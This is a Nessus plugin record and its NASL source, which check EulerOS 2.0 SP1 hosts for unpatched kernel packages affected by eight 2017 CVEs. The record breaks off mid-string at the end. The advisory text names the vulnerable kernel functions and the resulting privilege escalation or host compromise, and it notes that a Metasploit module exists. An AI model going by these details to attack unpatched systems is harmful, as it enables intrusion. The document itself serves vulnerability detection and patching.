ID EULEROS_SA-2017-1271.NASL Type nessus Reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2017-11-01T00:00:00
Description
According to the versions of the kernel packages installed, the
EulerOS installation on the remote host is affected by the following
vulnerabilities :
arch/x86/kvm/mmu.c in the Linux kernel through 4.13.5,
when nested virtualisation is used, does not properly
traverse guest pagetable entries to resolve a guest
virtual address, which allows L1 guest OS users to
execute arbitrary code on the host OS or cause a denial
of service (incorrect index during page walking, and
host OS crash), aka an MMU potential stack buffer
overrun.(CVE-2017-12188)
A vulnerability was found in the Key Management sub
component of the Linux kernel, where when trying to
issue a KEYTCL_READ on negative key would lead to a
NULL pointer dereference. A local attacker could use
this flaw to crash the kernel.(CVE-2017-12192)
security/keys/keyctl.c in the Linux kernel before
4.11.5 does not consider the case of a NULL payload in
conjunction with a nonzero length value, which allows
local users to cause a denial of service (NULL pointer
dereference and OOPS) via a crafted add_key or keyctl
system call, a different vulnerability than
CVE-2017-12192.(CVE-2017-15274)
Linux kernel: heap out-of-bounds in AF_PACKET sockets.
This new issue is analogous to previously disclosed
CVE-2016-8655. In both cases, a socket option that
changes socket state may race with safety checks in
packet_set_ring. Previously with PACKET_VERSION. This
time with PACKET_RESERVE. The solution is similar: lock
the socket for the update. This issue may be
exploitable, we did not investigate further. As this
issue affects PF_PACKET sockets, it requires
CAP_NET_RAW in the process namespace. But note that
with user namespaces enabled, any process can create a
namespace in which it has
CAP_NET_RAW.(CVE-2017-1000111)
Use-after-free vulnerability in the Linux kernel before
4.14-rc5 allows local users to have unspecified impact
via vectors related to /dev/snd/seq.(CVE-2017-15265)
net/packet/af_packet.c in the Linux kernel before
4.13.6 allows local users to gain privileges via
crafted system calls that trigger mishandling of
packet_fanout data structures, because of a race
condition (involving fanout_add and packet_do_bind)
that leads to a use-after-free, a different
vulnerability than CVE-2017-6346.(CVE-2017-15649)
The sg_ioctl function in drivers/scsi/sg.c in the Linux
kernel before 4.13.4 allows local users to obtain
sensitive information from uninitialized kernel
heap-memory locations via an SG_GET_REQUEST_TABLE ioctl
call for /dev/sg0.(CVE-2017-14991)
An exploitable memory corruption flaw was found in the
Linux kernel. The append path can be erroneously
switched from UFO to non-UFO in ip_ufo_append_data()
when building an UFO packet with MSG_MORE option. If
unprivileged user namespaces are available, this flaw
can be exploited to gain root
privileges.(CVE-2017-1000112)
Note that Tenable Network Security has extracted the preceding
description block directly from the EulerOS security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(104296);
script_version("3.15");
script_set_attribute(attribute:"plugin_modification_date", value:"2020/05/04");
script_cve_id(
"CVE-2017-1000111",
"CVE-2017-1000112",
"CVE-2017-12188",
"CVE-2017-12192",
"CVE-2017-14991",
"CVE-2017-15265",
"CVE-2017-15274",
"CVE-2017-15649"
);
script_name(english:"EulerOS 2.0 SP1 : kernel (EulerOS-SA-2017-1271)");
script_summary(english:"Checks the rpm output for the updated packages.");
script_set_attribute(attribute:"synopsis", value:
"The remote EulerOS host is missing multiple security updates.");
script_set_attribute(attribute:"description", value:
"According to the versions of the kernel packages installed, the
EulerOS installation on the remote host is affected by the following
vulnerabilities :
- arch/x86/kvm/mmu.c in the Linux kernel through 4.13.5,
when nested virtualisation is used, does not properly
traverse guest pagetable entries to resolve a guest
virtual address, which allows L1 guest OS users to
execute arbitrary code on the host OS or cause a denial
of service (incorrect index during page walking, and
host OS crash), aka an MMU potential stack buffer
overrun.(CVE-2017-12188)
- A vulnerability was found in the Key Management sub
component of the Linux kernel, where when trying to
issue a KEYTCL_READ on negative key would lead to a
NULL pointer dereference. A local attacker could use
this flaw to crash the kernel.(CVE-2017-12192)
- security/keys/keyctl.c in the Linux kernel before
4.11.5 does not consider the case of a NULL payload in
conjunction with a nonzero length value, which allows
local users to cause a denial of service (NULL pointer
dereference and OOPS) via a crafted add_key or keyctl
system call, a different vulnerability than
CVE-2017-12192.(CVE-2017-15274)
- Linux kernel: heap out-of-bounds in AF_PACKET sockets.
This new issue is analogous to previously disclosed
CVE-2016-8655. In both cases, a socket option that
changes socket state may race with safety checks in
packet_set_ring. Previously with PACKET_VERSION. This
time with PACKET_RESERVE. The solution is similar: lock
the socket for the update. This issue may be
exploitable, we did not investigate further. As this
issue affects PF_PACKET sockets, it requires
CAP_NET_RAW in the process namespace. But note that
with user namespaces enabled, any process can create a
namespace in which it has
CAP_NET_RAW.(CVE-2017-1000111)
- Use-after-free vulnerability in the Linux kernel before
4.14-rc5 allows local users to have unspecified impact
via vectors related to /dev/snd/seq.(CVE-2017-15265)
- net/packet/af_packet.c in the Linux kernel before
4.13.6 allows local users to gain privileges via
crafted system calls that trigger mishandling of
packet_fanout data structures, because of a race
condition (involving fanout_add and packet_do_bind)
that leads to a use-after-free, a different
vulnerability than CVE-2017-6346.(CVE-2017-15649)
- The sg_ioctl function in drivers/scsi/sg.c in the Linux
kernel before 4.13.4 allows local users to obtain
sensitive information from uninitialized kernel
heap-memory locations via an SG_GET_REQUEST_TABLE ioctl
call for /dev/sg0.(CVE-2017-14991)
- An exploitable memory corruption flaw was found in the
Linux kernel. The append path can be erroneously
switched from UFO to non-UFO in ip_ufo_append_data()
when building an UFO packet with MSG_MORE option. If
unprivileged user namespaces are available, this flaw
can be exploited to gain root
privileges.(CVE-2017-1000112)
Note that Tenable Network Security has extracted the preceding
description block directly from the EulerOS security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues.");
# https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1271
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?d973af9c");
script_set_attribute(attribute:"solution", value:
"Update the affected kernel packages.");
script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"exploited_by_malware", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"patch_publication_date", value:"2017/10/31");
script_set_attribute(attribute:"plugin_publication_date", value:"2017/11/01");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:kernel");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:kernel-debug");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:kernel-debuginfo");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:kernel-devel");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:kernel-headers");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:kernel-tools");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:kernel-tools-libs");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:perf");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:python-perf");
script_set_attribute(attribute:"cpe", value:"cpe:/o:huawei:euleros:2.0");
script_set_attribute(attribute:"generated_plugin", value:"current");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"Huawei Local Security Checks");
script_copyright(english:"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/EulerOS/release", "Host/EulerOS/rpm-list", "Host/EulerOS/sp");
script_exclude_keys("Host/EulerOS/uvp_version");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/EulerOS/release");
if (isnull(release) || release !~ "^EulerOS") audit(AUDIT_OS_NOT, "EulerOS");
if (release !~ "^EulerOS release 2\.0(\D|$)") audit(AUDIT_OS_NOT, "EulerOS 2.0");
sp = get_kb_item("Host/EulerOS/sp");
if (isnull(sp) || sp !~ "^(1)$") audit(AUDIT_OS_NOT, "EulerOS 2.0 SP1");
uvp = get_kb_item("Host/EulerOS/uvp_version");
if (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, "EulerOS 2.0 SP1", "EulerOS UVP " + uvp);
if (!get_kb_item("Host/EulerOS/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "aarch64" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "EulerOS", cpu);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_ARCH_NOT, "i686 / x86_64", cpu);
flag = 0;
pkgs = ["kernel-3.10.0-229.49.1.152",
"kernel-debug-3.10.0-229.49.1.152",
"kernel-debuginfo-3.10.0-229.49.1.152",
"kernel-debuginfo-common-x86_64-3.10.0-229.49.1.152",
"kernel-devel-3.10.0-229.49.1.152",
"kernel-headers-3.10.0-229.49.1.152",
"kernel-tools-3.10.0-229.49.1.152",
"kernel-tools-libs-3.10.0-229.49.1.152",
"perf-3.10.0-229.49.1.152",
"python-perf-3.10.0-229.49.1.152"];
foreach (pkg in pkgs)
if (rpm_check(release:"EulerOS-2.0", sp:"1", reference:pkg)) flag++;
if (flag)
{
security_report_v4(
port : 0,
severity : SECURITY_HOLE,
extra : rpm_report_get()
);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "kernel");
}
{"id": "EULEROS_SA-2017-1271.NASL", "bulletinFamily": "scanner", "title": "EulerOS 2.0 SP1 : kernel (EulerOS-SA-2017-1271)", "description": "According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - arch/x86/kvm/mmu.c in the Linux kernel through 4.13.5,\n when nested virtualisation is used, does not properly\n traverse guest pagetable entries to resolve a guest\n virtual address, which allows L1 guest OS users to\n execute arbitrary code on the host OS or cause a denial\n of service (incorrect index during page walking, and\n host OS crash), aka an MMU potential stack buffer\n overrun.(CVE-2017-12188)\n\n - A vulnerability was found in the Key Management sub\n component of the Linux kernel, where when trying to\n issue a KEYTCL_READ on negative key would lead to a\n NULL pointer dereference. A local attacker could use\n this flaw to crash the kernel.(CVE-2017-12192)\n\n - security/keys/keyctl.c in the Linux kernel before\n 4.11.5 does not consider the case of a NULL payload in\n conjunction with a nonzero length value, which allows\n local users to cause a denial of service (NULL pointer\n dereference and OOPS) via a crafted add_key or keyctl\n system call, a different vulnerability than\n CVE-2017-12192.(CVE-2017-15274)\n\n - Linux kernel: heap out-of-bounds in AF_PACKET sockets.\n This new issue is analogous to previously disclosed\n CVE-2016-8655. In both cases, a socket option that\n changes socket state may race with safety checks in\n packet_set_ring. Previously with PACKET_VERSION. This\n time with PACKET_RESERVE. The solution is similar: lock\n the socket for the update. This issue may be\n exploitable, we did not investigate further. As this\n issue affects PF_PACKET sockets, it requires\n CAP_NET_RAW in the process namespace. But note that\n with user namespaces enabled, any process can create a\n namespace in which it has\n CAP_NET_RAW.(CVE-2017-1000111)\n\n - Use-after-free vulnerability in the Linux kernel before\n 4.14-rc5 allows local users to have unspecified impact\n via vectors related to /dev/snd/seq.(CVE-2017-15265)\n\n - net/packet/af_packet.c in the Linux kernel before\n 4.13.6 allows local users to gain privileges via\n crafted system calls that trigger mishandling of\n packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind)\n that leads to a use-after-free, a different\n vulnerability than CVE-2017-6346.(CVE-2017-15649)\n\n - The sg_ioctl function in drivers/scsi/sg.c in the Linux\n kernel before 4.13.4 allows local users to obtain\n sensitive information from uninitialized kernel\n heap-memory locations via an SG_GET_REQUEST_TABLE ioctl\n call for /dev/sg0.(CVE-2017-14991)\n\n - An exploitable memory corruption flaw was found in the\n Linux kernel. The append path can be erroneously\n switched from UFO to non-UFO in ip_ufo_append_data()\n when building an UFO packet with MSG_MORE option. If\n unprivileged user namespaces are available, this flaw\n can be exploited to gain root\n privileges.(CVE-2017-1000112)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2017-11-01T00:00:00", "modified": "2017-11-01T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/104296", "reporter": "This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?d973af9c"], "cvelist": ["CVE-2017-12188", "CVE-2016-8655", "CVE-2017-1000111", "CVE-2017-15274", "CVE-2017-15265", "CVE-2017-14991", "CVE-2017-15649", "CVE-2017-1000112", "CVE-2017-12192", "CVE-2017-6346"], "type": "nessus", "lastseen": "2020-05-06T00:42:08", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-debug", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-debuginfo", "cpe:/o:huawei:euleros:2.0"], "cvelist": ["CVE-2017-12188", "CVE-2016-8655", "CVE-2017-1000111", "CVE-2017-15274", "CVE-2017-15265", "CVE-2017-14991", "CVE-2017-15649", "CVE-2017-1000112", "CVE-2017-12192", "CVE-2017-6346"], "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "description": "According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - arch/x86/kvm/mmu.c in the Linux kernel through 4.13.5,\n when nested virtualisation is used, does not properly\n traverse guest pagetable entries to resolve a guest\n virtual address, which allows L1 guest OS users to\n execute arbitrary code on the host OS or cause a denial\n of service (incorrect index during page walking, and\n host OS crash), aka an MMU potential stack buffer\n overrun.(CVE-2017-12188)\n\n - A vulnerability was found in the Key Management sub\n component of the Linux kernel, where when trying to\n issue a KEYTCL_READ on negative key would lead to a\n NULL pointer dereference. A local attacker could use\n this flaw to crash the kernel.(CVE-2017-12192)\n\n - security/keys/keyctl.c in the Linux kernel before\n 4.11.5 does not consider the case of a NULL payload in\n conjunction with a nonzero length value, which allows\n local users to cause a denial of service (NULL pointer\n dereference and OOPS) via a crafted add_key or keyctl\n system call, a different vulnerability than\n CVE-2017-12192.(CVE-2017-15274)\n\n - Linux kernel: heap out-of-bounds in AF_PACKET sockets.\n This new issue is analogous to previously disclosed\n CVE-2016-8655. In both cases, a socket option that\n changes socket state may race with safety checks in\n packet_set_ring. Previously with PACKET_VERSION. This\n time with PACKET_RESERVE. The solution is similar: lock\n the socket for the update. This issue may be\n exploitable, we did not investigate further. As this\n issue affects PF_PACKET sockets, it requires\n CAP_NET_RAW in the process namespace. But note that\n with user namespaces enabled, any process can create a\n namespace in which it has\n CAP_NET_RAW.(CVE-2017-1000111)\n\n - Use-after-free vulnerability in the Linux kernel before\n 4.14-rc5 allows local users to have unspecified impact\n via vectors related to /dev/snd/seq.(CVE-2017-15265)\n\n - net/packet/af_packet.c in the Linux kernel before\n 4.13.6 allows local users to gain privileges via\n crafted system calls that trigger mishandling of\n packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind)\n that leads to a use-after-free, a different\n vulnerability than CVE-2017-6346.(CVE-2017-15649)\n\n - The sg_ioctl function in drivers/scsi/sg.c in the Linux\n kernel before 4.13.4 allows local users to obtain\n sensitive information from uninitialized kernel\n heap-memory locations via an SG_GET_REQUEST_TABLE ioctl\n call for /dev/sg0.(CVE-2017-14991)\n\n - An exploitable memory corruption flaw was found in the\n Linux kernel. The append path can be erroneously\n switched from UFO to non-UFO in ip_ufo_append_data()\n when building an UFO packet with MSG_MORE option. If\n unprivileged user namespaces are available, this flaw\n can be exploited to gain root\n privileges.(CVE-2017-1000112)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "enchantments": {"dependencies": {"modified": "2020-03-17T22:27:35", "references": [{"idList": ["SUSE-SU-2018:0664-1", "OPENSUSE-SU-2017:2846-1", "SUSE-SU-2017:3165-1", "SUSE-SU-2017:3267-1", "OPENSUSE-SU-2017:2905-1", "SUSE-SU-2017:3315-1", "SUSE-SU-2017:2142-1", "SUSE-SU-2017:2150-1", "SUSE-SU-2017:2131-1", "SUSE-SU-2018:0562-1"], "type": "suse"}, {"idList": ["CVE-2017-12188", "CVE-2016-8655", "CVE-2017-1000111", "CVE-2017-15274", "CVE-2017-15265", "CVE-2017-14991", "CVE-2017-15649", "CVE-2017-1000112", "CVE-2017-12192", "CVE-2017-6346"], "type": "cve"}, {"idList": ["CESA-2017:3200"], "type": "centos"}, {"idList": ["UBUNTU_USN-3384-1.NASL", "OPENSUSE-2017-1194.NASL", "PHOTONOS_PHSA-2017-0043.NASL", "SUSE_SU-2017-2131-1.NASL", "PHOTONOS_PHSA-2017-0043_LINUX.NASL", "VIRTUOZZO_VZA-2017-072.NASL", "OPENSUSE-2017-1224.NASL", "SUSE_SU-2017-2150-1.NASL", "VIRTUOZZO_VZA-2017-073.NASL", "ALA_ALAS-2017-914.NASL"], "type": "nessus"}, {"idList": ["F5:K33567812", "F5:K60250153", "F5:K32616738", "F5:K11023978", "F5:K38472857", "F5:K44309215"], "type": "f5"}, {"idList": ["USN-3385-1", "USN-3384-1", "USN-3384-2", "USN-3385-2", "USN-3386-1", "USN-3386-2"], "type": "ubuntu"}, {"idList": ["H1:684573"], "type": "hackerone"}, {"idList": ["ALAS-2017-914", "ALAS-2017-868"], "type": "amazon"}, {"idList": ["OPENVAS:1361412562310851632", "OPENVAS:1361412562310843274", "OPENVAS:1361412562310812095", "OPENVAS:1361412562310843279", "OPENVAS:1361412562310843276", "OPENVAS:1361412562311220171271", "OPENVAS:1361412562310851638", "OPENVAS:1361412562310851594", "OPENVAS:1361412562310843278", "OPENVAS:1361412562310843275"], "type": "openvas"}, {"idList": ["CFOUNDRY:55CD35F3011A699D7E30AD5252951E34"], "type": "cloudfoundry"}, {"idList": ["VZA-2017-094", "VZA-2017-107", "VZA-2017-071", "VZA-2017-096", "VZA-2017-095", "VZA-2017-072", "VZA-2017-100", "VZA-2017-099", "VZA-2017-073", "VZA-2017-106"], "type": "virtuozzo"}, {"idList": ["SSV:92567", "SSV:96343", "SSV:96778"], "type": "seebug"}], "rev": 2}, "score": {"modified": "2020-03-17T22:27:35", "rev": 2, "value": 7.8, "vector": "NONE"}}, "hash": "7d60197696862e7e705920f20188868bfbedf6809dea6e1bdb2b39b7af032fc6", "hashmap": [{"hash": "77a934ad743276b761d63310df7ef73c", "key": "cpe"}, {"hash": "42ba02a7c521490011837a978982f202", "key": "reporter"}, {"hash": "60bbc994d7c2f83d786d256af97bbde6", "key": "href"}, {"hash": "7f3fc6aad33a1863cefc360385a3b643", "key": "pluginID"}, {"hash": "b2573c147a18eb3538492c3eb18bffba", "key": "title"}, {"hash": "2c23739456a1260ec0dda9d22fdc03d2", "key": "modified"}, {"hash": "2c23739456a1260ec0dda9d22fdc03d2", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5a9d8c89e60f42161926fdd6ac15aae3", "key": "sourceData"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "85da04adfdf3db30015e70536363a88d", "key": "cvss3"}, {"hash": "947b607053a3e8b8b136a4a68e7e2992", "key": "cvelist"}, {"hash": "1fffb424dc4ef5d64db9c838acac60cc", "key": "description"}, {"hash": "67933a273737791ab6f71e29a2605c31", "key": "naslFamily"}, {"hash": "ef7b4f3e2ff6266e74f4b4252b7a7d11", "key": "references"}, {"hash": "f74481c4d3fb2a622ac8c8a438ded811", "key": "cvss"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/104296", "id": "EULEROS_SA-2017-1271.NASL", "lastseen": "2020-03-17T22:27:35", "modified": "2017-11-01T00:00:00", "naslFamily": "Huawei Local Security Checks", "objectVersion": "1.3", "pluginID": "104296", "published": "2017-11-01T00:00:00", "references": ["http://www.nessus.org/u?d973af9c"], "reporter": "This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104296);\n script_version(\"3.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/04\");\n\n script_cve_id(\n \"CVE-2017-1000111\",\n \"CVE-2017-1000112\",\n \"CVE-2017-12188\",\n \"CVE-2017-12192\",\n \"CVE-2017-14991\",\n \"CVE-2017-15265\",\n \"CVE-2017-15274\",\n \"CVE-2017-15649\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : kernel (EulerOS-SA-2017-1271)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - arch/x86/kvm/mmu.c in the Linux kernel through 4.13.5,\n when nested virtualisation is used, does not properly\n traverse guest pagetable entries to resolve a guest\n virtual address, which allows L1 guest OS users to\n execute arbitrary code on the host OS or cause a denial\n of service (incorrect index during page walking, and\n host OS crash), aka an MMU potential stack buffer\n overrun.(CVE-2017-12188)\n\n - A vulnerability was found in the Key Management sub\n component of the Linux kernel, where when trying to\n issue a KEYTCL_READ on negative key would lead to a\n NULL pointer dereference. A local attacker could use\n this flaw to crash the kernel.(CVE-2017-12192)\n\n - security/keys/keyctl.c in the Linux kernel before\n 4.11.5 does not consider the case of a NULL payload in\n conjunction with a nonzero length value, which allows\n local users to cause a denial of service (NULL pointer\n dereference and OOPS) via a crafted add_key or keyctl\n system call, a different vulnerability than\n CVE-2017-12192.(CVE-2017-15274)\n\n - Linux kernel: heap out-of-bounds in AF_PACKET sockets.\n This new issue is analogous to previously disclosed\n CVE-2016-8655. In both cases, a socket option that\n changes socket state may race with safety checks in\n packet_set_ring. Previously with PACKET_VERSION. This\n time with PACKET_RESERVE. The solution is similar: lock\n the socket for the update. This issue may be\n exploitable, we did not investigate further. As this\n issue affects PF_PACKET sockets, it requires\n CAP_NET_RAW in the process namespace. But note that\n with user namespaces enabled, any process can create a\n namespace in which it has\n CAP_NET_RAW.(CVE-2017-1000111)\n\n - Use-after-free vulnerability in the Linux kernel before\n 4.14-rc5 allows local users to have unspecified impact\n via vectors related to /dev/snd/seq.(CVE-2017-15265)\n\n - net/packet/af_packet.c in the Linux kernel before\n 4.13.6 allows local users to gain privileges via\n crafted system calls that trigger mishandling of\n packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind)\n that leads to a use-after-free, a different\n vulnerability than CVE-2017-6346.(CVE-2017-15649)\n\n - The sg_ioctl function in drivers/scsi/sg.c in the Linux\n kernel before 4.13.4 allows local users to obtain\n sensitive information from uninitialized kernel\n heap-memory locations via an SG_GET_REQUEST_TABLE ioctl\n call for /dev/sg0.(CVE-2017-14991)\n\n - An exploitable memory corruption flaw was found in the\n Linux kernel. The append path can be erroneously\n switched from UFO to non-UFO in ip_ufo_append_data()\n when building an UFO packet with MSG_MORE option. If\n unprivileged user namespaces are available, this flaw\n can be exploited to gain root\n privileges.(CVE-2017-1000112)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1271\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d973af9c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-229.49.1.152\",\n \"kernel-debug-3.10.0-229.49.1.152\",\n \"kernel-debuginfo-3.10.0-229.49.1.152\",\n \"kernel-debuginfo-common-x86_64-3.10.0-229.49.1.152\",\n \"kernel-devel-3.10.0-229.49.1.152\",\n \"kernel-headers-3.10.0-229.49.1.152\",\n \"kernel-tools-3.10.0-229.49.1.152\",\n \"kernel-tools-libs-3.10.0-229.49.1.152\",\n \"perf-3.10.0-229.49.1.152\",\n 